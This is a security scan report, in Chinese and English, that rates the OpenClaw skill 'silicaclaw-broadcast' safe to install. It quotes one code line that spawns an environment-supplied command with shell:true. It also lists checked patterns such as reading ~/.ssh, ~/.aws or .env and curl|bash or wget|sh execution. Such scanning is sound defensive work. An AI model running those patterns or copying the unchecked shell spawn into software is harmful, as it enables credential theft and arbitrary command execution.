silicaclaw-broadcast 安全扫描报告 — 可信 | ClawSafe

5 /100

silicaclaw-broadcast

Official OpenClaw skill for a bounded local SilicaClaw broadcast workflow: read public broadcasts, publish public broadcasts, and optionally forward owner-relevant summaries through OpenClaw's native channel.

SilicaClaw Broadcast is a legitimate local-bridge workflow skill with well-documented capabilities, no undeclared behavior, and no malicious indicators.

技能名称silicaclaw-broadcast

分析耗时38.0s

引擎pi

✓

可以安装

This skill is safe to use. Ensure the OPENCLAW_OWNER_FORWARD_CMD environment variable is set to a trusted command before deploying.

安全发现 1 项

严重性	安全发现	位置
低危	Subprocess execution with shell:true owner-forwarder-demo.mjs uses child_process.spawn with shell:true to execute OPENCLAW_OWNER_FORWARD_CMD. This is a legitimate forwarding mechanism but could theoretically execute arbitrary commands if the environment variable is compromised. `const child = spawn(OWNER_FORWARD_CMD, { shell: true, stdio: ['pipe', 'inherit', 'inherit'], env: process.env });` → This is documented and intentional. Ensure the OPENCLAW_OWNER_FORWARD_CMD environment variable is set to a trusted, hardcoded command path rather than user-controlled input in production deployments.	`scripts/owner-forwarder-demo.mjs:50`

资源类型	声明权限	推断权限	状态	证据
网络访问	`READ`	`READ`	✓ 一致	SKILL.md line 4: 'connect to a local SilicaClaw node at http://localhost:4310'; …
命令执行	`WRITE`	`WRITE`	✓ 一致	SKILL.md line 145: 'OPENCLAW_OWNER_FORWARD_CMD=node scripts/owner-dispatch-adapt…
环境变量	`READ`	`READ`	✓ 一致	SKILL.md: OPENCLAW_OWNER_FORWARD_CMD, OPENCLAW_SOURCE_DIR, OPENCLAW_OWNER_CHANNE…
文件系统	`NONE`	`NONE`	—	No filesystem access in any script. bridge-client.mjs reads only command-line ar…
剪贴板	`NONE`	`NONE`	—	No clipboard access observed.
技能调用	`WRITE`	`WRITE`	✓ 一致	manifest.json: forward_to_owner_via_openclaw, owner_forwarding_policy, owner_dis…
浏览器	`NONE`	`NONE`	—	No browser access observed.
数据库	`NONE`	`NONE`	—	No database access observed.

目录结构

11 文件 · 26.4 KB · 782 行

Markdown 5f · 490L JavaScript 4f · 251L JSON 1f · 35L YAML 1f · 6L

├─ ▾ 📁 agents

│ └─ 📋 openai.yaml YAML 6L · 742 B

├─ ▾ 📁 references

│ ├─ 📝 computer-control-via-openclaw.md Markdown 41L · 1.6 KB

│ ├─ 📝 owner-dialogue-cheatsheet-zh.md Markdown 81L · 2.0 KB

│ ├─ 📝 owner-dispatch-adapter.md Markdown 81L · 2.3 KB

│ └─ 📝 owner-forwarding-policy.md Markdown 48L · 1.9 KB

├─ ▾ 📁 scripts

│ ├─ 📜 bridge-client.mjs JavaScript 59L · 1.7 KB

│ ├─ 📜 owner-dispatch-adapter-demo.mjs JavaScript 12L · 255 B

│ ├─ 📜 owner-forwarder-demo.mjs JavaScript 111L · 3.5 KB

│ └─ 📜 send-to-owner-via-openclaw.mjs JavaScript 69L · 1.6 KB

├─ 📋 manifest.json JSON 35L · 1.4 KB

└─ 📝 SKILL.md Markdown 239L · 9.5 KB

安全亮点

✓ All network activity is restricted to localhost:4310 (the local SilicaClaw bridge)

✓ No credential harvesting or environment variable iteration for sensitive keys

✓ No base64 encoding, eval(), or dynamic code execution

✓ No access to sensitive paths (~/.ssh, ~/.aws, .env, etc.)

✓ No remote script execution (curl|bash, wget|sh)

✓ No hidden functionality—all shell execution is declared in SKILL.md and gated by explicit environment variables

✓ Strong safety boundaries documented: no arbitrary code execution from broadcast content, no wallet/private key access, no unknown remote endpoints

✓ Input validation on send command (requires --body flag)

✓ Message scoring logic is transparent and documented

✓ Well-structured payload forwarding with explicit schema